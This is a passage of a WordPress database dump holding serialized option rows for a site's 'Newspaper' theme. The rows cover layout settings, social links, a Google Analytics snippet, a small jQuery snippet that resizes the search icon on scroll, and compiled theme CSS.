time\";i:1490209827;s:4:\"data\";a:2:{s:19:\"wp_inactive_widgets\";a:2:{i:0;s:6:\"text-6\";i:1;s:6:\"text-5\";}s:9:\"sidebar-1\";a:0:{}}}}','yes'),(472,'current_theme','Newspaper','yes'),(473,'theme_mods_Newspaper','a:3:{i:0;b:0;s:18:\"nav_menu_locations\";a:5:{s:11:\"header-menu\";s:2:\"34\";s:8:\"top-menu\";s:0:\"\";s:11:\"footer-menu\";s:3:\"378\";s:18:\"header-menu-mobile\";s:2:\"34\";s:18:\"footer-menu-mobile\";s:3:\"378\";}s:18:\"custom_css_post_id\";i:-1;}','yes'),(474,'theme_switched','','yes'),(475,'td_011','a:377:{s:19:\"td_cake_status_time\";i:1435153310;s:12:\"firstInstall\";s:14:\"themeInstalled\";s:18:\"tds_thumb_td_80x60\";s:3:\"yes\";s:19:\"tds_thumb_td_100x70\";s:3:\"yes\";s:20:\"tds_thumb_td_218x150\";s:3:\"yes\";s:20:\"tds_thumb_td_265x198\";s:3:\"yes\";s:20:\"tds_thumb_td_324x160\";s:3:\"yes\";s:20:\"tds_thumb_td_324x235\";s:3:\"yes\";s:20:\"tds_thumb_td_324x400\";s:3:\"yes\";s:20:\"tds_thumb_td_356x220\";s:3:\"yes\";s:20:\"tds_thumb_td_356x364\";s:3:\"yes\";s:20:\"tds_thumb_td_533x261\";s:3:\"yes\";s:20:\"tds_thumb_td_534x462\";s:3:\"yes\";s:18:\"tds_thumb_td_696x0\";s:3:\"yes\";s:20:\"tds_thumb_td_696x385\";s:3:\"yes\";s:20:\"tds_thumb_td_741x486\";s:3:\"yes\";s:21:\"tds_thumb_td_1068x580\";s:3:\"yes\";s:19:\"tds_thumb_td_1068x0\";s:3:\"yes\";s:18:\"tds_thumb_td_0x420\";s:3:\"yes\";s:10:\"td_version\";s:3:\"7.8\";s:14:\"td_cake_status\";s:1:\"2\";s:12:\"tds_language\";s:0:\"\";s:16:\"tds_header_style\";s:0:\"\";s:11:\"tds_top_bar\";s:0:\"\";s:20:\"tds_top_bar_template\";s:0:\"\";s:12:\"tds_top_menu\";s:0:\"\";s:23:\"td_social_networks_show\";s:4:\"show\";s:24:\"tds_login_sign_in_widget\";s:0:\"\";s:17:\"tds_data_top_menu\";s:0:\"\";s:20:\"tds_data_time_format\";s:0:\"\";s:13:\"tds_snap_menu\";s:4:\"snap\";s:18:\"tds_logo_on_sticky\";s:16:\"show_header_logo\";s:15:\"tds_logo_upload\";s:62:\"https://birthdaypedia.com/wp-content/uploads/2015/06/logo1.png\";s:17:\"tds_logo_upload_r\";s:0:\"\";s:18:\"tds_favicon_upload\";s:0:\"\";s:12:\"tds_logo_alt\";s:0:\"\";s:14:\"tds_logo_title\";s:0:\"\";s:13:\"tds_logo_text\";s:0:\"\";s:16:\"tds_tagline_text\";s:0:\"\";s:20:\"tds_logo_menu_upload\";s:0:\"\";s:22:\"tds_logo_menu_upload_r\";s:0:\"\";s:15:\"tds_ios_icon_76\";s:0:\"\";s:16:\"tds_ios_icon_114\";s:0:\"\";s:16:\"tds_ios_icon_120\";s:0:\"\";s:16:\"tds_ios_icon_144\";s:0:\"\";s:16:\"tds_ios_icon_152\";s:0:\"\";s:10:\"tds_footer\";s:0:\"\";s:19:\"tds_footer_template\";s:21:\"td_footer_template_12\";s:22:\"tds_footer_logo_upload\";s:68:\"https://birthdaypedia.com/wp-content/uploads/2015/06/logo-footer.png\";s:29:\"tds_footer_retina_logo_upload\";s:0:\"\";s:15:\"tds_footer_text\";s:57:\"Lorem Ipsum dolor sit amet icd case touyr duresc al kiodr\";s:16:\"tds_footer_email\";s:0:\"\";s:17:\"tds_footer_social\";s:0:\"\";s:14:\"tds_sub_footer\";s:0:\"\";s:20:\"tds_footer_copyright\";s:16:\"Copyright - 2017\";s:22:\"tds_footer_copy_symbol\";s:0:\"\";s:23:\"tds_inline_ad_paragraph\";s:0:\"\";s:19:\"tds_inline_ad_align\";s:0:\"\";s:24:\"tds_background_click_url\";s:0:\"\";s:27:\"tds_background_click_target\";s:0:\"\";s:17:\"tds_smart_sidebar\";s:7:\"enabled\";s:20:\"tds_breadcrumbs_show\";s:0:\"\";s:25:\"tds_breadcrumbs_show_home\";s:4:\"hide\";s:27:\"tds_breadcrumbs_show_parent\";s:0:\"\";s:28:\"tds_breadcrumbs_show_article\";s:0:\"\";s:19:\"tds_animation_stack\";s:0:\"\";s:26:\"tds_animation_stack_effect\";s:0:\"\";s:17:\"tds_smooth_scroll\";s:0:\"\";s:19:\"tds_404_page_layout\";s:0:\"\";s:23:\"tds_archive_page_layout\";s:0:\"\";s:23:\"tds_archive_sidebar_pos\";s:0:\"\";s:19:\"tds_archive_sidebar\";s:0:\"\";s:26:\"tds_attachment_sidebar_pos\";s:0:\"\";s:22:\"tds_attachment_sidebar\";s:0:\"\";s:22:\"tds_author_page_layout\";s:0:\"\";s:22:\"tds_author_sidebar_pos\";s:0:\"\";s:18:\"tds_author_sidebar\";s:0:\"\";s:20:\"tds_home_page_layout\";s:0:\"\";s:20:\"tds_home_sidebar_pos\";s:0:\"\";s:16:\"tds_home_sidebar\";s:0:\"\";s:20:\"tds_page_sidebar_pos\";s:0:\"\";s:16:\"tds_page_sidebar\";s:0:\"\";s:26:\"tds_disable_comments_pages\";s:0:\"\";s:22:\"tds_search_page_layout\";s:0:\"\";s:22:\"tds_search_sidebar_pos\";s:0:\"\";s:18:\"tds_search_sidebar\";s:0:\"\";s:19:\"tds_tag_page_layout\";s:0:\"\";s:19:\"tds_tag_sidebar_pos\";s:0:\"\";s:15:\"tds_tag_sidebar\";s:0:\"\";s:19:\"tds_woo_sidebar_pos\";s:0:\"\";s:15:\"tds_woo_sidebar\";s:0:\"\";s:26:\"tds_woo-single_sidebar_pos\";s:0:\"\";s:22:\"tds_woo-single_sidebar\";s:0:\"\";s:23:\"tds_bbpress_sidebar_pos\";s:0:\"\";s:19:\"tds_bbpress_sidebar\";s:0:\"\";s:21:\"tds_category_template\";s:22:\"td_category_template_5\";s:28:\"tds_category_top_posts_style\";s:35:\"td_category_top_posts_style_disable\";s:26:\"tds_category_td_grid_style\";s:15:\"td-grid-style-1\";s:24:\"tds_category_page_layout\";s:1:\"2\";s:24:\"tds_category_sidebar_pos\";s:0:\"\";s:20:\"tds_category_sidebar\";s:0:\"\";s:21:\"tds_p_categories_tags\";s:4:\"hide\";s:22:\"tds_p_show_author_name\";s:0:\"\";s:15:\"tds_p_show_date\";s:4:\"hide\";s:16:\"tds_p_show_views\";s:4:\"hide\";s:19:\"tds_p_show_comments\";s:4:\"hide\";s:13:\"tds_show_tags\";s:4:\"hide\";s:19:\"tds_show_author_box\";s:4:\"hide\";s:18:\"tds_show_next_prev\";s:4:\"hide\";s:29:\"tds_disable_comments_sidewide\";s:0:\"\";s:29:\"td_default_site_post_template\";s:17:\"single_template_2\";s:23:\"tds_show_featured_image\";s:0:\"\";s:35:\"tds_hide_featured_image_placeholder\";s:0:\"\";s:31:\"tds_featured_image_view_setting\";s:0:\"\";s:20:\"tds_similar_articles\";s:4:\"hide\";s:25:\"tds_similar_articles_type\";s:0:\"\";s:25:\"tds_similar_articles_rows\";s:0:\"\";s:19:\"tds_top_social_show\";s:0:\"\";s:23:\"tds_top_like_tweet_show\";s:0:\"\";s:22:\"tds_bottom_social_show\";s:4:\"hide\";s:26:\"tds_bottom_like_tweet_show\";s:4:\"hide\";s:20:\"tds_tweeter_username\";s:0:\"\";s:38:\"tds_more_articles_on_post_pages_enable\";s:0:\"\";s:49:\"tds_more_articles_on_post_pages_distance_from_top\";s:0:\"\";s:39:\"tds_more_articles_on_post_pages_display\";s:0:\"\";s:46:\"tds_more_articles_on_post_pages_display_module\";s:0:\"\";s:38:\"tds_more_articles_on_post_pages_number\";s:0:\"\";s:44:\"tds_more_articles_on_post_pages_time_to_wait\";s:0:\"\";s:24:\"tds_ajax_post_view_count\";s:0:\"\";s:21:\"tds_category_module_1\";s:0:\"\";s:21:\"tds_category_module_2\";s:0:\"\";s:21:\"tds_category_module_3\";s:0:\"\";s:21:\"tds_category_module_4\";s:0:\"\";s:21:\"tds_category_module_5\";s:0:\"\";s:21:\"tds_category_module_6\";s:0:\"\";s:21:\"tds_category_module_7\";s:0:\"\";s:21:\"tds_category_module_8\";s:0:\"\";s:21:\"tds_category_module_9\";s:0:\"\";s:22:\"tds_category_module_10\";s:0:\"\";s:22:\"tds_category_module_11\";s:0:\"\";s:22:\"tds_category_module_12\";s:0:\"\";s:22:\"tds_category_module_13\";s:0:\"\";s:22:\"tds_category_module_14\";s:0:\"\";s:22:\"tds_category_module_15\";s:0:\"\";s:22:\"tds_category_module_16\";s:0:\"\";s:23:\"tds_category_module_mx1\";s:0:\"\";s:23:\"tds_category_module_mx2\";s:0:\"\";s:23:\"tds_category_module_mx3\";s:0:\"\";s:23:\"tds_category_module_mx4\";s:0:\"\";s:23:\"tds_category_module_mx5\";s:0:\"\";s:23:\"tds_category_module_mx6\";s:0:\"\";s:23:\"tds_category_module_mx7\";s:0:\"\";s:23:\"tds_category_module_mx8\";s:0:\"\";s:23:\"tds_category_module_mx9\";s:0:\"\";s:24:\"tds_category_module_mx10\";s:0:\"\";s:24:\"tds_category_module_mx11\";s:0:\"\";s:24:\"tds_category_module_mx12\";s:0:\"\";s:24:\"tds_category_module_mx13\";s:0:\"\";s:24:\"tds_category_module_mx14\";s:0:\"\";s:33:\"tds_category_module_related_posts\";s:0:\"\";s:29:\"tds_category_module_mega_menu\";s:0:\"\";s:25:\"tds_category_module_slide\";s:0:\"\";s:25:\"tds_p_enable_7_days_count\";s:0:\"\";s:25:\"tds_site_background_image\";s:0:\"\";s:26:\"tds_site_background_repeat\";s:0:\"\";s:30:\"tds_site_background_position_x\";s:0:\"\";s:30:\"tds_site_background_attachment\";s:0:\"\";s:22:\"tds_stretch_background\";s:0:\"\";s:17:\"tds_excerpts_type\";s:0:\"\";s:25:\"td_module_1_title_excerpt\";s:0:\"\";s:25:\"td_module_2_title_excerpt\";s:0:\"\";s:27:\"td_module_2_content_excerpt\";s:0:\"\";s:25:\"td_module_3_title_excerpt\";s:0:\"\";s:25:\"td_module_4_title_excerpt\";s:0:\"\";s:27:\"td_module_4_content_excerpt\";s:0:\"\";s:25:\"td_module_5_title_excerpt\";s:0:\"\";s:27:\"td_module_5_content_excerpt\";s:0:\"\";s:25:\"td_module_6_title_excerpt\";s:0:\"\";s:25:\"td_module_7_title_excerpt\";s:0:\"\";s:25:\"td_module_8_title_excerpt\";s:0:\"\";s:25:\"td_module_9_title_excerpt\";s:0:\"\";s:26:\"td_module_10_title_excerpt\";s:0:\"\";s:28:\"td_module_10_content_excerpt\";s:0:\"\";s:26:\"td_module_11_title_excerpt\";s:0:\"\";s:28:\"td_module_11_content_excerpt\";s:0:\"\";s:26:\"td_module_12_title_excerpt\";s:0:\"\";s:28:\"td_module_12_content_excerpt\";s:0:\"\";s:26:\"td_module_13_title_excerpt\";s:0:\"\";s:26:\"td_module_14_title_excerpt\";s:0:\"\";s:28:\"td_module_14_content_excerpt\";s:0:\"\";s:26:\"td_module_16_title_excerpt\";s:0:\"\";s:28:\"td_module_16_content_excerpt\";s:0:\"\";s:27:\"td_module_mx1_title_excerpt\";s:0:\"\";s:27:\"td_module_mx2_title_excerpt\";s:0:\"\";s:27:\"td_module_mx3_title_excerpt\";s:0:\"\";s:27:\"td_module_mx4_title_excerpt\";s:0:\"\";s:27:\"td_module_mx5_title_excerpt\";s:0:\"\";s:27:\"td_module_mx6_title_excerpt\";s:0:\"\";s:27:\"td_module_mx7_title_excerpt\";s:0:\"\";s:29:\"td_module_mx7_content_excerpt\";s:0:\"\";s:27:\"td_module_mx8_title_excerpt\";s:0:\"\";s:27:\"td_module_mx9_title_excerpt\";s:0:\"\";s:28:\"td_module_mx10_title_excerpt\";s:0:\"\";s:28:\"td_module_mx11_title_excerpt\";s:0:\"\";s:28:\"td_module_mx12_title_excerpt\";s:0:\"\";s:28:\"td_module_mx13_title_excerpt\";s:0:\"\";s:28:\"td_module_mx14_title_excerpt\";s:0:\"\";s:37:\"td_module_related_posts_title_excerpt\";s:0:\"\";s:29:\"td_module_slide_title_excerpt\";s:0:\"\";s:36:\"td_module_trending_now_title_excerpt\";s:0:\"\";s:21:\"tds_header_wrap_color\";s:0:\"\";s:16:\"tds_footer_color\";s:7:\"#ffffff\";s:21:\"tds_footer_text_color\";s:0:\"\";s:23:\"tds_footer_bottom_color\";s:7:\"#c9c9ff\";s:28:\"tds_footer_bottom_text_color\";s:7:\"#000000\";s:14:\"tds_custom_css\";s:208:\"h1{\r\n font-family: quattrocento sans;\r\n}\r\n\r\n/*Prevent seach icon from changing size when viewes on mobile*/\r\n@media (max-width: 400px){\r\n i.td-icon-search{\r\n font-size: 19px !important;\r\n }\r\n}\";s:26:\"tds_responsive_css_desktop\";s:0:\"\";s:33:\"tds_responsive_css_ipad_landscape\";s:0:\"\";s:32:\"tds_responsive_css_ipad_portrait\";s:0:\"\";s:24:\"tds_responsive_css_phone\";s:0:\"\";s:15:\"td_body_classes\";s:0:\"\";s:21:\"tds_custom_javascript\";s:472:\"/*\r\n Increase search icon when scrolling to aid user \r\n*/\r\njQuery(window).on(\\\'scroll\\\', function(){\r\n var searchIcon = jQuery(\\\'i.td-icon-search\\\');\r\n var curScroll = window.pageYOffset;\r\n \r\n if(curScroll < 500){\r\n searchIcon.css(\\\'font-size\\\', \\\'19px\\\');\r\n }\r\n else if(curScroll > 500 && curScroll < 950){\r\n searchIcon.css(\\\'font-size\\\', \\\'24px\\\');\r\n }\r\n else if(curScroll > 950){\r\n searchIcon.css(\\\'font-size\\\', \\\'35px\\\');\r\n }\r\n});\";s:12:\"td_analytics\";s:519:\"<meta name=\\\"msvalidate.01\\\" content=\\\"5CB15F13E82B475444B3BC43E21A165E\\\" />\r\n<script>\r\n (function(i,s,o,g,r,a,m){i[\\\'GoogleAnalyticsObject\\\']=r;i[r]=i[r]||function(){\r\n (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),\r\n m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)\r\n })(window,document,\\\'script\\\',\\\'https://www.google-analytics.com/analytics.js\\\',\\\'ga\\\');\r\n\r\n ga(\\\'create\\\', \\\'UA-55537349-7\\\', \\\'auto\\\');\r\n ga(\\\'send\\\', \\\'pageview\\\');\r\n\r\n</script>\";s:6:\"td_ads\";a:24:{s:6:\"header\";a:9:{s:7:\"ad_code\";s:0:\"\";s:9:\"disable_m\";s:0:\"\";s:6:\"m_size\";s:0:\"\";s:10:\"disable_tl\";s:0:\"\";s:7:\"tl_size\";s:0:\"\";s:10:\"disable_tp\";s:0:\"\";s:7:\"tp_size\";s:0:\"\";s:9:\"disable_p\";s:0:\"\";s:6:\"p_size\";s:0:\"\";}s:7:\"sidebar\";a:9:{s:7:\"ad_code\";s:0:\"\";s:9:\"disable_m\";s:0:\"\";s:6:\"m_size\";s:0:\"\";s:10:\"disable_tl\";s:0:\"\";s:7:\"tl_size\";s:0:\"\";s:10:\"disable_tp\";s:0:\"\";s:7:\"tp_size\";s:0:\"\";s:9:\"disable_p\";s:0:\"\";s:6:\"p_size\";s:0:\"\";}s:11:\"content_top\";a:9:{s:7:\"ad_code\";s:0:\"\";s:9:\"disable_m\";s:0:\"\";s:6:\"m_size\";s:0:\"\";s:10:\"disable_tl\";s:0:\"\";s:7:\"tl_size\";s:0:\"\";s:10:\"disable_tp\";s:0:\"\";s:7:\"tp_size\";s:0:\"\";s:9:\"disable_p\";s:0:\"\";s:6:\"p_size\";s:0:\"\";}s:14:\"content_inline\";a:9:{s:7:\"ad_code\";s:0:\"\";s:9:\"disable_m\";s:0:\"\";s:6:\"m_size\";s:0:\"\";s:10:\"disable_tl\";s:0:\"\";s:7:\"tl_size\";s:0:\"\";s:10:\"disable_tp\";s:0:\"\";s:7:\"tp_size\";s:0:\"\";s:9:\"disable_p\";s:0:\"\";s:6:\"p_size\";s:0:\"\";}s:14:\"content_bottom\";a:9:{s:7:\"ad_code\";s:0:\"\";s:9:\"disable_m\";s:0:\"\";s:6:\"m_size\";s:0:\"\";s:10:\"disable_tl\";s:0:\"\";s:7:\"tl_size\";s:0:\"\";s:10:\"disable_tp\";s:0:\"\";s:7:\"tp_size\";s:0:\"\";s:9:\"disable_p\";s:0:\"\";s:6:\"p_size\";s:0:\"\";}s:11:\"custom_ad_1\";a:9:{s:7:\"ad_code\";s:0:\"\";s:9:\"disable_m\";s:0:\"\";s:6:\"m_size\";s:0:\"\";s:10:\"disable_tl\";s:0:\"\";s:7:\"tl_size\";s:0:\"\";s:10:\"disable_tp\";s:0:\"\";s:7:\"tp_size\";s:0:\"\";s:9:\"disable_p\";s:0:\"\";s:6:\"p_size\";s:0:\"\";}s:11:\"custom_ad_2\";a:9:{s:7:\"ad_code\";s:0:\"\";s:9:\"disable_m\";s:0:\"\";s:6:\"m_size\";s:0:\"\";s:10:\"disable_tl\";s:0:\"\";s:7:\"tl_size\";s:0:\"\";s:10:\"disable_tp\";s:0:\"\";s:7:\"tp_size\";s:0:\"\";s:9:\"disable_p\";s:0:\"\";s:6:\"p_size\";s:0:\"\";}s:11:\"custom_ad_3\";a:9:{s:7:\"ad_code\";s:0:\"\";s:9:\"disable_m\";s:0:\"\";s:6:\"m_size\";s:0:\"\";s:10:\"disable_tl\";s:0:\"\";s:7:\"tl_size\";s:0:\"\";s:10:\"disable_tp\";s:0:\"\";s:7:\"tp_size\";s:0:\"\";s:9:\"disable_p\";s:0:\"\";s:6:\"p_size\";s:0:\"\";}s:11:\"custom_ad_4\";a:10:{s:7:\"ad_code\";s:104:\"<a href=\\\"#\\\"><img src=\\\"https://birthdaypedia.com/wp-content/uploads/2015/06/ad-300x250.jpg\\\"></a><br/>\";s:9:\"disable_m\";s:0:\"\";s:6:\"m_size\";s:0:\"\";s:10:\"disable_tl\";s:0:\"\";s:7:\"tl_size\";s:0:\"\";s:10:\"disable_tp\";s:0:\"\";s:7:\"tp_size\";s:0:\"\";s:9:\"disable_p\";s:0:\"\";s:6:\"p_size\";s:0:\"\";s:15:\"current_ad_type\";s:5:\"other\";}s:10:\"footer_top\";a:9:{s:7:\"ad_code\";s:0:\"\";s:9:\"disable_m\";s:0:\"\";s:6:\"m_size\";s:0:\"\";s:10:\"disable_tl\";s:0:\"\";s:7:\"tl_size\";s:0:\"\";s:10:\"disable_tp\";s:0:\"\";s:7:\"tp_size\";s:0:\"\";s:9:\"disable_p\";s:0:\"\";s:6:\"p_size\";s:0:\"\";}s:11:\"custom_ad_5\";a:9:{s:7:\"ad_code\";s:0:\"\";s:9:\"disable_m\";s:0:\"\";s:6:\"m_size\";s:0:\"\";s:10:\"disable_tl\";s:0:\"\";s:7:\"tl_size\";s:0:\"\";s:10:\"disable_tp\";s:0:\"\";s:7:\"tp_size\";s:0:\"\";s:9:\"disable_p\";s:0:\"\";s:6:\"p_size\";s:0:\"\";}s:10:\"header_mob\";a:1:{s:7:\"ad_code\";s:0:\"\";}s:10:\"footer_mob\";a:1:{s:7:\"ad_code\";s:0:\"\";}s:14:\"smart_list_mob\";a:1:{s:7:\"ad_code\";s:0:\"\";}s:8:\"loop_mob\";a:1:{s:7:\"ad_code\";s:0:\"\";}s:15:\"content_top_mob\";a:1:{s:7:\"ad_code\";s:0:\"\";}s:18:\"content_bottom_mob\";a:1:{s:7:\"ad_code\";s:0:\"\";}s:18:\"content_inline_mob\";a:1:{s:7:\"ad_code\";s:0:\"\";}s:12:\"post_style_1\";a:9:{s:7:\"ad_code\";s:0:\"\";s:9:\"disable_m\";s:0:\"\";s:6:\"m_size\";s:0:\"\";s:10:\"disable_tl\";s:0:\"\";s:7:\"tl_size\";s:0:\"\";s:10:\"disable_tp\";s:0:\"\";s:7:\"tp_size\";s:0:\"\";s:9:\"disable_p\";s:0:\"\";s:6:\"p_size\";s:0:\"\";}s:13:\"post_style_11\";a:9:{s:7:\"ad_code\";s:0:\"\";s:9:\"disable_m\";s:0:\"\";s:6:\"m_size\";s:0:\"\";s:10:\"disable_tl\";s:0:\"\";s:7:\"tl_size\";s:0:\"\";s:10:\"disable_tp\";s:0:\"\";s:7:\"tp_size\";s:0:\"\";s:9:\"disable_p\";s:0:\"\";s:6:\"p_size\";s:0:\"\";}s:13:\"post_style_12\";a:9:{s:7:\"ad_code\";s:0:\"\";s:9:\"disable_m\";s:0:\"\";s:6:\"m_size\";s:0:\"\";s:10:\"disable_tl\";s:0:\"\";s:7:\"tl_size\";s:0:\"\";s:10:\"disable_tp\";s:0:\"\";s:7:\"tp_size\";s:0:\"\";s:9:\"disable_p\";s:0:\"\";s:6:\"p_size\";s:0:\"\";}s:12:\"smart_list_6\";a:9:{s:7:\"ad_code\";s:0:\"\";s:9:\"disable_m\";s:0:\"\";s:6:\"m_size\";s:0:\"\";s:10:\"disable_tl\";s:0:\"\";s:7:\"tl_size\";s:0:\"\";s:10:\"disable_tp\";s:0:\"\";s:7:\"tp_size\";s:0:\"\";s:9:\"disable_p\";s:0:\"\";s:6:\"p_size\";s:0:\"\";}s:12:\"smart_list_7\";a:9:{s:7:\"ad_code\";s:0:\"\";s:9:\"disable_m\";s:0:\"\";s:6:\"m_size\";s:0:\"\";s:10:\"disable_tl\";s:0:\"\";s:7:\"tl_size\";s:0:\"\";s:10:\"disable_tp\";s:0:\"\";s:7:\"tp_size\";s:0:\"\";s:9:\"disable_p\";s:0:\"\";s:6:\"p_size\";s:0:\"\";}s:12:\"smart_list_8\";a:9:{s:7:\"ad_code\";s:0:\"\";s:9:\"disable_m\";s:0:\"\";s:6:\"m_size\";s:0:\"\";s:10:\"disable_tl\";s:0:\"\";s:7:\"tl_size\";s:0:\"\";s:10:\"disable_tp\";s:0:\"\";s:7:\"tp_size\";s:0:\"\";s:9:\"disable_p\";s:0:\"\";s:6:\"p_size\";s:0:\"\";}}s:18:\"td_social_networks\";a:3:{s:8:\"facebook\";s:38:\"https://www.facebook.com/birthdaypedia\";s:10:\"googleplus\";s:70:\"https://plus.google.com/u/1/b/102531223699476703415/dashboard/overview\";s:7:\"twitter\";s:33:\"https://twitter.com/birthdaypedia\";}s:20:\"tds_user_compile_css\";s:15364:\".td-header-wrap .black-menu .sf-menu > .current-menu-item > a,\r\n .td-header-wrap .black-menu .sf-menu > .current-menu-ancestor > a,\r\n .td-header-wrap .black-menu .sf-menu > .current-category-ancestor > a,\r\n .td-header-wrap .black-menu .sf-menu > li > a:hover,\r\n .td-header-wrap .black-menu .sf-menu > .sfHover > a,\r\n .td-header-style-12 .td-header-menu-wrap-full,\r\n .sf-menu > .current-menu-item > a:after,\r\n .sf-menu > .current-menu-ancestor > a:after,\r\n .sf-menu > .current-category-ancestor > a:after,\r\n .sf-menu > li:hover > a:after,\r\n .sf-menu > .sfHover > a:after,\r\n .td-header-style-12 .td-affix,\r\n .header-search-wrap .td-drop-down-search:after,\r\n .header-search-wrap .td-drop-down-search .btn:hover,\r\n input[type=submit]:hover,\r\n .td-read-more a,\r\n .td-post-category:hover,\r\n .td-grid-style-1.td-hover-1 .td-big-grid-post:hover .td-post-category,\r\n .td-grid-style-5.td-hover-1 .td-big-grid-post:hover .td-post-category,\r\n .td_top_authors .td-active .td-author-post-count,\r\n .td_top_authors .td-active .td-author-comments-count,\r\n .td_top_authors .td_mod_wrap:hover .td-author-post-count,\r\n .td_top_authors .td_mod_wrap:hover .td-author-comments-count,\r\n .td-404-sub-sub-title a:hover,\r\n .td-search-form-widget .wpb_button:hover,\r\n .td-rating-bar-wrap div,\r\n .td_category_template_3 .td-current-sub-category,\r\n .dropcap,\r\n .td_wrapper_video_playlist .td_video_controls_playlist_wrapper,\r\n .wpb_default,\r\n .wpb_default:hover,\r\n .td-left-smart-list:hover,\r\n .td-right-smart-list:hover,\r\n .woocommerce-checkout .woocommerce input.button:hover,\r\n .woocommerce-page .woocommerce a.button:hover,\r\n .woocommerce-account div.woocommerce .button:hover,\r\n #bbpress-forums button:hover,\r\n .bbp_widget_login .button:hover,\r\n .td-footer-wrapper .td-post-category,\r\n .td-footer-wrapper .widget_product_search input[type=\"submit\"]:hover,\r\n .woocommerce .product a.button:hover,\r\n .woocommerce .product #respond input#submit:hover,\r\n .woocommerce .checkout input#place_order:hover,\r\n .woocommerce .woocommerce.widget .button:hover,\r\n .single-product .product .summary .cart .button:hover,\r\n .woocommerce-cart .woocommerce table.cart .button:hover,\r\n .woocommerce-cart .woocommerce .shipping-calculator-form .button:hover,\r\n .td-next-prev-wrap a:hover,\r\n .td-load-more-wrap a:hover,\r\n .td-post-small-box a:hover,\r\n .page-nav .current,\r\n .page-nav:first-child > div,\r\n .td_category_template_8 .td-category-header .td-category a.td-current-sub-category,\r\n .td_category_template_4 .td-category-siblings .td-category a:hover,\r\n #bbpress-forums .bbp-pagination .current,\r\n #bbpress-forums #bbp-single-user-details #bbp-user-navigation li.current a,\r\n .td-theme-slider:hover .slide-meta-cat a,\r\n a.vc_btn-black:hover,\r\n .td-trending-now-wrapper:hover .td-trending-now-title,\r\n .td-scroll-up,\r\n .td-smart-list-button:hover,\r\n .td-weather-information:before,\r\n .td-weather-week:before,\r\n .td_block_exchange .td-exchange-header:before,\r\n .td_block_big_grid_9.td-grid-style-1 .td-post-category,\r\n .td_block_big_grid_9.td-grid-style-5 .td-post-category,\r\n .td-grid-style-6.td-hover-1 .td-module-thumb:after,\r\n .td-pulldown-syle-2 .td-subcat-dropdown ul:after,\r\n .td_block_template_9 .td-block-title:after,\r\n .td_block_template_15 .td-block-title:before {\r\n background-color: #ff7f7f;\r\n }\r\n\r\n .global-block-template-4 .td-related-title .td-cur-simple-item:before {\r\n border-color: #ff7f7f transparent transparent transparent !important;\r\n }\r\n\r\n .woocommerce .woocommerce-message .button:hover,\r\n .woocommerce .woocommerce-error .button:hover,\r\n .woocommerce .woocommerce-info .button:hover,\r\n .global-block-template-4 .td-related-title .td-cur-simple-item,\r\n .global-block-template-3 .td-related-title .td-cur-simple-item,\r\n .global-block-template-9 .td-related-title:after {\r\n background-color: #ff7f7f !important;\r\n }\r\n\r\n .woocommerce .product .onsale,\r\n .woocommerce.widget .ui-slider .ui-slider-handle {\r\n background: none #ff7f7f;\r\n }\r\n\r\n .woocommerce.widget.widget_layered_nav_filters ul li a {\r\n background: none repeat scroll 0 0 #ff7f7f !important;\r\n }\r\n\r\n a,\r\n cite a:hover,\r\n .td_mega_menu_sub_cats .cur-sub-cat,\r\n .td-mega-span h3 a:hover,\r\n .td_mod_mega_menu:hover .entry-title a,\r\n .header-search-wrap .result-msg a:hover,\r\n .top-header-menu li a:hover,\r\n .top-header-menu .current-menu-item > a,\r\n .top-header-menu .current-menu-ancestor > a,\r\n .top-header-menu .current-category-ancestor > a,\r\n .td-social-icon-wrap > a:hover,\r\n .td-header-sp-top-widget .td-social-icon-wrap a:hover,\r\n .td-page-content blockquote p,\r\n .td-post-content blockquote p,\r\n .mce-content-body blockquote p,\r\n .comment-content blockquote p,\r\n .wpb_text_column blockquote p,\r\n .td_block_text_with_title blockquote p,\r\n .td_module_wrap:hover .entry-title a,\r\n .td-subcat-filter .td-subcat-list a:hover,\r\n .td-subcat-filter .td-subcat-dropdown a:hover,\r\n .td_quote_on_blocks,\r\n .dropcap2,\r\n .dropcap3,\r\n .td_top_authors .td-active .td-authors-name a,\r\n .td_top_authors .td_mod_wrap:hover .td-authors-name a,\r\n .td-post-next-prev-content a:hover,\r\n .author-box-wrap .td-author-social a:hover,\r\n .td-author-name a:hover,\r\n .td-author-url a:hover,\r\n .td_mod_related_posts:hover h3 > a,\r\n .td-post-template-11 .td-related-title .td-related-left:hover,\r\n .td-post-template-11 .td-related-title .td-related-right:hover,\r\n .td-post-template-11 .td-related-title .td-cur-simple-item,\r\n .td-post-template-11 .td_block_related_posts .td-next-prev-wrap a:hover,\r\n .comment-reply-link:hover,\r\n .logged-in-as a:hover,\r\n #cancel-comment-reply-link:hover,\r\n .td-search-query,\r\n .td-category-header .td-pulldown-category-filter-link:hover,\r\n .td-category-siblings .td-subcat-dropdown a:hover,\r\n .td-category-siblings .td-subcat-dropdown a.td-current-sub-category,\r\n .widget a:hover,\r\n .archive .widget_archive .current,\r\n .archive .widget_archive .current a,\r\n .widget_calendar tfoot a:hover,\r\n .woocommerce a.added_to_cart:hover,\r\n #bbpress-forums li.bbp-header .bbp-reply-content span a:hover,\r\n #bbpress-forums .bbp-forum-freshness a:hover,\r\n #bbpress-forums .bbp-topic-freshness a:hover,\r\n #bbpress-forums .bbp-forums-list li a:hover,\r\n #bbpress-forums .bbp-forum-title:hover,\r\n #bbpress-forums .bbp-topic-permalink:hover,\r\n #bbpress-forums .bbp-topic-started-by a:hover,\r\n #bbpress-forums .bbp-topic-started-in a:hover,\r\n #bbpress-forums .bbp-body .super-sticky li.bbp-topic-title .bbp-topic-permalink,\r\n #bbpress-forums .bbp-body .sticky li.bbp-topic-title .bbp-topic-permalink,\r\n .widget_display_replies .bbp-author-name,\r\n .widget_display_topics .bbp-author-name,\r\n .footer-text-wrap .footer-email-wrap a,\r\n .td-subfooter-menu li a:hover,\r\n .footer-social-wrap a:hover,\r\n a.vc_btn-black:hover,\r\n .td-smart-list-dropdown-wrap .td-smart-list-button:hover,\r\n .td_module_17 .td-read-more a:hover,\r\n .td_module_18 .td-read-more a:hover,\r\n .td_module_19 .td-post-author-name a:hover,\r\n .td-instagram-user a,\r\n .td-pulldown-syle-2 .td-subcat-dropdown:hover .td-subcat-more span,\r\n .td-pulldown-syle-2 .td-subcat-dropdown:hover .td-subcat-more i,\r\n .td-pulldown-syle-3 .td-subcat-dropdown:hover .td-subcat-more span,\r\n .td-pulldown-syle-3 .td-subcat-dropdown:hover 